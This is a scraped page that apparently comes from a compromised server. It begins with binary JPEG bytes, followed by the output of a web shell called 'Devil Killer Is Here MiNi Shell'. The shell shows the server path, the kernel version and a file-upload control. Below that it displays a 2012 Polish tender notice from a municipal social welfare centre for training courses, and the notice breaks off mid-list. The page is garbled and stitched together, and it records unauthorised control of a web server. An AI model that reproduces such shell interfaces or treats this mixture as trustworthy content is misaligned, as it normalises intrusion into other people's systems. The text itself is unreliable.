JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120518/161784-N-2012.html

<p class="kh_header"><b>Ostrowy: Przeprowadzenie usług szkoleniowych w ramach projektu Nowa szansa.</b><br>
<b>Numer ogłoszenia: 161784 - 2012; data zamieszczenia: 18.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Nowych Ostrowach , Wołodrza 7, 99-350 Ostrowy, woj. łódzkie, tel. 24 356 15 75, faks 24 356 15 75.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie usług szkoleniowych w ramach projektu Nowa szansa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie usług szkoleniowych w ramach projektu Nowa szansa.Przedmiot zamówienia obejmuje 4 następujące części:
Część 1 - Zajęcia  z doradcą zawodowym dla 14 uczestników w tym 2 osoby niepełnosprawne  w wymiarze 30 godzin (lekcyjnych) zajęć grupowych oraz 70 godzin (lekcyjnych) zajęć indywidualnych (14 uczestników x 5 godzin lekcyjnych dla każdego uczestnika).
Część 2 - Zajęcia z psychologiem dla 14 uczestników w tym 2 osoby niepełnosprawne  w wymiarze 30 godzin (lekcyjnych) zajęć grupowych oraz 70 godzin (lekcyjnych) zajęć indywidualnych (14 uczestników x 5 godzin lekcyjnych dla każdego uczestnika).
Część 3 - Szkolenie zawodowe Ogrodnik terenów zieleni w wymiarze 100 godzin (lekcyjnych) grupowych z czego 23 godzin (lekcyjnych) stanowi teoria a 77 godzin (lekcyjnych) praktyka dla 11 uczestników w tym 1 osoba niepełnosprawna.
Część 4 - Kurs  Podstaw obsługi komputera i poruszanie się po Internecie dla 13 uczestników w tym 2 osoby niepełnosprawne  w wymiarze 45 godzin (lekcyjnych) zajęć grupowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest złożenie przez Wykonawcę wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentu potwierdzającego, że usługi zostały wykonane należycie - Załącznik Nr 3 do SIWZ.
Uszczegółowienie:
    Warunek zostanie spełniony, jeżeli Wykonawca w wyżej wymienionym okresie, w każdym roku tego okresu wykonał co najmniej 1 usługę o takim samym lub podobnym charakterze   przedmiotu zamówienia  o  wartości nie mniejszej niż 10 000,00zł, oraz załączył stosowne dokumenty potwierdzające należyte wykonanie tych usług - Załącznik Nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest złożenie przez Wykonawcę wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonywania zamówienia, a także zakresem wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami Załącznik Nr 5 do SIWZ;
      Uszczegółowienie:
      Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje
minimum 1 prowadzącym/trenerem posiadającym wykształcenie wyższe psychologiczne lub pedagogiczne,(w przypadku składania oferty dotyczącej części 1 lub 2, osobą mającą uprawnienia do przeprowadzenia szkolenia Ogrodnik terenów zieleni( w przypadku składania oferty dotyczącej części 3 ), osobą mającą uprawnienia do przeprowadzenia szkolenia  Podstawy obsługi komputera i poruszania się po Internecie( w przypadku składania oferty dotyczącej części 4). Osoby przeprowadzające szkolenie powinny  posiadać doświadczenie w przeprowadzeniu  co najmniej 1 usługi szkoleniowej dla co najmniej 10 osób  z zakresu opisanego w części przedmiotu zamówienia, w okresie maksymalnie 3 lat przed upływem terminu składania ofert) - Załącznik Nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę, że posiada w całym okresie trwania umowy opłaconą polisę na kwotę nie mniej niż 10.000,00 zł, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zaświadczenia o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych, zaktualizowane w 2012r. przez Wojewódzki Urząd Pracy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany umowy w przypadku ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.noweostrowy.bip.org.pl/ zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Nowych Ostrowach
Wołodrza 7
99 - 350 Ostrowy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2012 godzina 10:30, miejsce: Gminny Ośrodek Pomocy Społecznej w Nowych Ostrowach
Wołodrza 7
99 - 350 Ostrowy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Nowa szansa współfinansowany ze środków Unii Europejskiej w ramach Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia  z doradcą zawodowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia  z doradcą zawodowym dla 14 uczestników w tym 2 osoby niepełnosprawne  w wymiarze 30 godzin (lekcyjnych) zajęć grupowych oraz 70 godzin (lekcyjnych) zajęć indywidualnych (14 uczestników x 5 godzin lekcyjnych dla każdego uczestnika).
Wykonawca na czas trwania zajęć zobowiązany jest:
-przeprowadzić Zajęcia z doradcą zawodowym  na terenie gminy Nowe Ostrowy 
-przeprowadzić Zajęcia z doradcą zawodowym  od poniedziałku do piątku w ilości maksymalnie 7 godzin lekcyjnych dziennie z zapewnieniem przynajmniej jednej przerwy na posiłek, 
-wyposażyć sale wykładowe w odpowiedni sprzęt dydaktyczny, a uczestników zajęć w materiały szkoleniowe niezbędne do prawidłowej realizacji programu szkolenia (długopis, skrypt, zeszyt oraz inne niezbędne materiały potrzebne do przeprowadzenia zajęć);
-dostarczyć komplet materiałów szkoleniowych Zamawiającemu;
-zapewnić warunki zgodnie z przepisami BHP w trakcie trwania zajęć.
-zapewnić uczestnikom zajęć wyżywienie: tj. posiłek regeneracyjny (obiad - zupa , porcja mięsa, surówka, ziemniaki/kasza/ryż, kompot lub napój), kawa, herbata, bułka słodka codziennie dla każdego uczestnika w dniu zajęć grupowych .
-prowadzić dokumentację fotograficzną z przeprowadzonych zajęć a po zakończeniu dostarczyć płytę do Zamawiającego;
-ubezpieczyć uczestników zajęć od następstw nieszczęśliwych wypadków na czas trwania szkoleń oraz w drodze do i  z miejsca szkolenia. Koszt ubezpieczenia NNW należy ująć w koszcie zajęć.
-informować o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej,                      a także oznakowanie miejsce realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1                      z 27.12.2006) i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013. 
-przeprowadzić wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu zajęć, m. in. na podstawie formularza ankiety oceniającej, jak również przedstawić jej wyniki Zamawiającemu. 
-przekazać przed podpisaniem umowy Zamawiającemu oraz uczestnikom szkolenia na pierwszych zajęciach harmonogram realizowanych zajęć w skład którego mają wchodzić następujące zagadnienia: pisanie CV, pisanie listu motywacyjnego, metody aktywnego poszukiwania pracy oraz przygotowanie do potencjalnych rozmów kwalifikacyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia z psychologiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia z psychologiem dla 14 uczestników w tym 2 osoby niepełnosprawne  w wymiarze 30 godzin (lekcyjnych) zajęć grupowych oraz 70 godzin (lekcyjnych) zajęć indywidualnych (14 uczestników x 5 godzin lekcyjnych dla każdego uczestnika).
Wykonawca na czas trwania treningu zobowiązany jest:
-przeprowadzić Zajęcia z psychologiem  na terenie gminy Nowe Ostrowy 
-przeprowadzić Zajęcia z psychologiem  od poniedziałku do piątku w ilości maksymalnie 7 godzin lekcyjnych dziennie z zapewnieniem przynajmniej jednej przerwy na posiłek, 
-wyposażyć sale wykładowe w odpowiedni sprzęt dydaktyczny, a uczestników zajęć w materiały szkoleniowe niezbędne do prawidłowej realizacji programu szkolenia (długopis, skrypt, zeszyt oraz inne niezbędne materiały potrzebne do przeprowadzenia zajęć);
-dostarczyć komplet materiałów szkoleniowych Zamawiającemu;
-zapewnić warunki zgodnie z przepisami BHP w trakcie trwania zajęć.
-zapewnić uczestnikom zajęć wyżywienie: tj. posiłek regeneracyjny (obiad - zupa , porcja mięsa, surówka, ziemniaki/kasza/ryż, kompot lub napój), kawa, herbata, bułka słodka codziennie dla każdego uczestnika w dniu zajęć grupowych .
-prowadzić dokumentację fotograficzną z przeprowadzonych zajęć a  po zakończeniu dostarczyć płytę do Zamawiającego;
-ubezpieczyć uczestników treningu od następstw nieszczęśliwych wypadków na czas trwania szkoleń oraz w drodze do i  z miejsca szkolenia. Koszt ubezpieczenia NNW należy ująć w koszcie zajęć.
-informować o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji kursowej informacji o udziale Unii Europejskiej,                      a także oznakować miejsce realizacji kursu, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz Rozporządzenia Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr 1083/2006 (Dz. Urz. UE L 371/1                      z 27.12.2006) i wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013. 
-przeprowadzić wśród uczestników zajęć ocenę merytoryczną i techniczną przebiegu zajęć, m. in. na podstawie formularza ankiety oceniającej, jak również  przedstawić jej wyniki Zamawiającemu. 
-przekazać przed podpisaniem umowy Zamawiającemu oraz uczestnikom szkolenia na pierwszych zajęciach  harmonogram realizowanych zajęć z uwzględnieniem następującej tematyki tj. : sztuka komunikowania się, trening asertywności, radzenie sobie ze stresem, podnoszenie poczucia własnej wartości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenie zawodowe Ogrodnik terenów zieleni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie zawodowe Ogrodnik terenów zieleni w wymiarze 100 godzin (lekcyjnych) grupowych z czego 23 godzin (lekcyjnych) stanowi teoria a 77 godzin (lekcyjnych) praktyka dla 11 uczestników w tym 1 osoba niepełnosprawna .
PLAN  NAUCZANIA
Wiadomości ogólne - 2godziny teoretyczne
Elementy projektowania ogrodów. Urządzanie i pielęgnowanie terenów zieleni - 8 godzin teoretycznych, 5 godzin praktycznych
Urządzanie i pielęgnowanie terenów zieleni  - 5 godzin teoretycznych, 72 godziny praktyczne
Mechanizacja prac ogrodniczych - 8 godzin praktycznych
Razem 23 teoretyczne + 77 godzin praktycznych. Łącznie 100 godzin.
 WYKAZ JEDNOSTEK MODUŁOWYCH
Moduł I. Wiadomości ogólne
Jednostki modułowe:
Rozpoczęcie kursu
Podstawowe wiadomości z botaniki
Uprawa gleby i nawożenie roślin
Ochrona roślin
Moduł II. Elementy projektowania ogrodów. Urządzanie i pielęgnacja terenów zieleni
Jednostki modułowe:
Urządzanie terenów zieleni  wiadomości ogólne
Dokumentacja techniczna
Prace porządkowe i roboty ziemne
Drogi i nawierzchnie ogrodowe
Mała architektura ogrodowa
Roślinoznawstwo
Podstawowe elementy terenów zieleni
Organizacja zarządzania i utrzymania terenów zieleni
Projekt zagospodarowania zielenią ogrodu
Moduł III. Urządzanie i pielęgnacja terenów zieleni  
Jednostki modułowe:
Organizacja praktyk zawodowych. Pomoc przedlekarska
Zakładanie i pielęgnacja powierzchni trawiastych
Zakładanie i pielęgnacja rabat kwiatowych
Sadzenie i pielęgnacja drzew i krzewów
Zakładanie i pielęgnacja rabat bylinowych
Inne formy dekoracji roślinnej
Budowa i pielęgnacja dróg parkowych
Moduł IV. Mechanizacja prac ogrodniczych
Jednostki modułowe:
Wiadomości ogólne. Przepisy prawne związane z zagadnieniami bhp
Budowa ciągnika
Zasady bezpieczeństwa ruchu drogowego
Maszyny i narzędzia używane do prac przygotowawczych przy urządzaniu terenów zieleni
Maszyny i narzędzia do podstawowej uprawy gleby
Maszyny i narzędzia do siewu i sadzenia
Mechanizacja ochrony roślin
Mechanizacja pielęgnacji powierzchni trawiastych
Urządzenia i maszyny do podlewania i zraszania
Urządzenia i narzędzia do pielęgnacji drzew i krzewów
Narzędzia i maszyny do ścinania i karczowania drzew
Konserwacja i przechowywanie narzędzi i maszyn
Wykaz narzędzi niżej wymienionych jakie musi posiadać Wykonawca i udostępnić uczestnikom szkolenia przez okres jego trwania: sztychówki, piaskówki, grabie metalowe, grabie drewniane (ew. plastikowe), miotło-grabie, motyczki lekkie i ciężkie, pazurki, łopatki do sadzenia, kołki do sadzenia, aerator, wał, taczki, wózek typu japonka, opryskiwacz plecakowy, sznur z dwoma kołkami, taśma miernicza, sekatory małe, sekatory o przedłużonych ramionach, sekator do cięcia gałęzi w koronach drzew, nożyce szpalerowe, drabiny, kosiarka spalinowa (ew. elektryczna), wykaszarka spalinowa (ew. elektryczna), ciągnik i doczepiane do niego  -  pług, brona talerzowa, glebogryzarka, kosiarka rotacyjna, kosiarka listwowa, opryskiwacz.
Wykonawca na czas trwania zajęć zobowiązany jest:
-przeprowadzić szkolenie Ogrodnik terenów zieleni  na terenie gminy Nowe Ostrowy 
-przeprowadzić szkolenie Ogrodnik terenów zieleni  od poniedziałku do piątku w ilości maksymalnie 7 godzin lekcyjnych dziennie z zapewnieniem przynajmniej jednej przerwy na posiłek, 
-wyposażyć sale wykładowe w odpowiedni sprzęt dydaktyczny, a uczestników zajęć w materiały szkoleniowe niezbędne do prawidłowej realizacji programu szkolenia (długopis, skrypt, zeszyt oraz inne niezbędne materiały potrzebne do przeprowadzenia zajęć);
-dostarczyć komplet materiałów szkoleniowych Zamawiającemu;
-zapewnić warunki zgodnie z przepisami BHP w trakcie trwania zajęć.
